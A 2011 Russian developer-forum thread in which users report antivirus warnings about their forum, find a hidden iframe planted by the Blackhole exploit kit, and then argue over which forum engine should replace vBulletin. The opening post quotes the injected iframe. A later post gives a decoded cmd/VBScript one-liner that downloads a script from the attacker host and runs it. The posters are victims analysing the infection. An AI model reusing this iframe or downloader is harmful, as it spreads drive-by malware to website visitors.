Справочник функций

Ваш аккаунт

Войти через: 
Забыли пароль?
Регистрация
Информацию о новых материалах можно получать и без регистрации:

Почтовая рассылка

Подписчиков: -1
Последний выпуск: 19.06.2015

Web Attack: Blackhole Toolkit Website 5

260
19 июля 2011 года
Ramon
1.1K / / 16.08.2003
 
Код:
<iframe mwcgp=7PE23NiU src="http://vvd8.bz.cm/index.php?tp=8b1065b60d07b8e3" width=1 height=1 frameborder=0 style="visibility:hidden"></iframe>


Только у меня орет антивырус на сию каку в коденетовских страницах?
87
19 июля 2011 года
Kogrom
2.7K / / 02.02.2008
Днём было подобное - что-то нехорошее лезло в кеш Оперы. Ругалась и Опера, и антивирус (тот самый от MS). Сейчас пишу не из Windows. Тут Опера молчит.
Онлайн сервис dr.Web сейчас ничего плохого не находит.
278
19 июля 2011 года
Alexander92
1.1K / / 04.08.2008
Весь день сегодня эта дрянь. Расшифровка того, что она пытается запустить:

 
Код:
cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://vvd8.bz.cm/games/hcp_vbs.php?f=32",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe


Официально вроде называется
Цитата:

Exploit:JS/Blacole.A

9
19 июля 2011 года
Lerkin
3.0K / / 25.03.2003
Да, да, да. Антивирь гундосит за HTML/Iframe.B.Gen. Это плохо? Мы все умрем?

P.S. Говорят, это троян. На оперу и огнелиса нацеленный. Брешут, поди...
4
20 июля 2011 года
mike
3.7K / / 01.10.2002
Отпустило?
11
20 июля 2011 года
oxotnik333
2.9K / / 03.08.2007
Цитата: mike
Отпустило?


не отпустило.. под лисой выдает (куки чистил), под оперой нормально работает и работало... хром не юзаю

399
20 июля 2011 года
KIV
432 / / 20.01.2009
У меня хромиум под Linux предупреждает, что типа на этом сайте есть вредоносное ПО и он может причинить вред моему компьютеру.
4
20 июля 2011 года
mike
3.7K / / 01.10.2002
Цитата: oxotnik333
не отпустило.. под лисой выдает (куки чистил), под оперой нормально работает и работало... хром не юзаю

Я про антивирусы. Google не быстро сообразит.

11
20 июля 2011 года
oxotnik333
2.9K / / 03.08.2007
Цитата: mike
Я про антивирусы.


ааа... чего нет, того нет...

4
20 июля 2011 года
mike
3.7K / / 01.10.2002
Цитата:
ааа... чего нет, того нет...


Вот и у меня та же фигня :)
Мне этот вбуллетин уже попрек горла. Есть идеи на что заменить?
https://www.vbulletin.com/forum/showthread.php/384249-vBulletin-4.X-Security-Patch

69K
20 июля 2011 года
noob c++
21 / / 10.07.2011
Все началось вчера утром. Avast IS обноружил чужой ифрейм на forum.codenet.ru. Вместе с форумом подгружается странича с связкой Блек холе (не плохая связка эксплойтов нацеленная не только на браузеры, но и на флеш, яву, пдф). Через нее и грузят на наши машины троя. Вчера форум лочил антивирус, а сегодня Mozilla Firefox 5 заблокировал. Поздравляю администрацию с удачным поподанием в блек листы. То что на страницах форума стоит ифрей ясно как день указывает на его взлом. Не поленитесь подтереть ифрейм из страниц, как и шелл который в любом случае есть (на вряд ли такой посещаемый ресурс оставят в покое).
p.s. Остается сидеть с мобилы, которой такое не по чем )
6
20 июля 2011 года
George
4.1K / / 05.01.2007
Цитата: mike
Мне этот вбуллетин уже попрек горла. Есть идеи на что заменить?


PhpBB какой-нибудь, который еще хуже. :(

69K
20 июля 2011 года
noob c++
21 / / 10.07.2011
Цитата: George
PhpBB какой-нибудь, который еще хуже. :(



phpbb лучше тем, что на него не нужна платная лицензия, движок имеет открытый исходный код, частое обновление, за последний год-два не слышно не о одной уязвимости как и о взломе, что нельзя сказать о булке которая так и славится дырами.

p.s. и вообще не факт, что ломали именно движок, а не тех у кого к нему есть доступ )

316
20 июля 2011 года
Alm3n
889 / / 29.05.2009
Можно подробнее как детектировать угрозу? Что-то и Opera и Outpost молчат. Не проморгали ли.
6
20 июля 2011 года
George
4.1K / / 05.01.2007
Цитата: noob c++
phpbb лучше тем, что на него не нужна платная лицензия, движок имеет открытый исходный код, частое обновление, за последний год-два не слышно не о одной уязвимости как и о взломе, что нельзя сказать о булке которая так и славится дырами.


Зато он неудобный как холера.

Цитата: noob c++
p.s. и вообще не факт, что ломали именно движок, а не тех у кого к нему есть доступ )


Доступ только у Майка есть.

26K
20 июля 2011 года
mudBit
224 / / 30.05.2011
Цитата: George
Доступ только у Майка есть.



И у хакеров... Хотя что здесь воровать, не понятно.

274
20 июля 2011 года
Lone Wolf
1.3K / / 26.11.2006
Цитата: noob c++
phpbb лучше тем, что на него не нужна платная лицензия, движок имеет открытый исходный код, частое обновление, за последний год-два не слышно не о одной уязвимости как и о взломе, что нельзя сказать о булке которая так и славится дырами.

p.s. и вообще не факт, что ломали именно движок, а не тех у кого к нему есть доступ )




пхпББ - это детище индусов-недоучек. Свое время интегрировал его в один проэкт, с разработкой своих плагинов и адаптацией авторизации - это просто п%%%%%ц

лучше уже какой-то punbBB взять и собрать как конструктор. Он простой как палка, правда и в коробке ничего не имеет.

69K
20 июля 2011 года
noob c++
21 / / 10.07.2011
Цитата: Alm3n
Можно подробнее как детектировать угрозу? Что-то и Opera и Outpost молчат. Не проморгали ли.



с мозилы зайдите и все увидите. есть сервисы по проверке, но сейчас не вспомню адреса

69K
20 июля 2011 года
noob c++
21 / / 10.07.2011
Цитата: Lone Wolf
пхпББ - это детище индусов-недоучек. Свое время интегрировал его в один проэкт, с разработкой своих плагинов и адаптацией авторизации - это просто п%%%%%ц

лучше уже какой-то punbBB взять и собрать как конструктор. Он простой как палка, правда и в коробке ничего не имеет.



Я вас прекрасно понимаю. Сам не раз задействовал его в своих проектах. Много возникало трудностей с которыми хоть не сразу, но справлялись. Но на данный момент речь идет о безопасности. Приведу пример закрытого хак сообщества darkode, которое с 2008 года сидит на phpbb. Естественно не из-за красоты и удобства. Да и вообще "в умелых руках и х... балалайка"
Для меня вообще без разницы какой тут будет движок, лиж бы проект жил!

10
21 июля 2011 года
Freeman
3.2K / / 06.03.2004
Цитата: Lone Wolf
лучше уже какой-то punbBB взять и собрать как конструктор. Он простой как палка, правда и в коробке ничего не имеет.


Во, только хотел написать, как меня опередили.

У PunBB плагины через eval() выполняются, что кагбэ не очень. Зато мне понравилась его продуманность в плане перевода. Сразу видно: расовый русский форум, разрабатываемый русской англоязычной (!) компанией.

Ещё есть FluxBB, который чуть ли не самый быстрый из всех, но у него код плагинов в исходник встраивается -- зашибёшься интегрировать и обновлять. В 2.0 обещают по-другому сделать. Дожить бы.

Реклама на сайте | Обмен ссылками | Ссылки | Экспорт (RSS) | Контакты
Добавить статью | Добавить исходник | Добавить хостинг-провайдера | Добавить сайт в каталог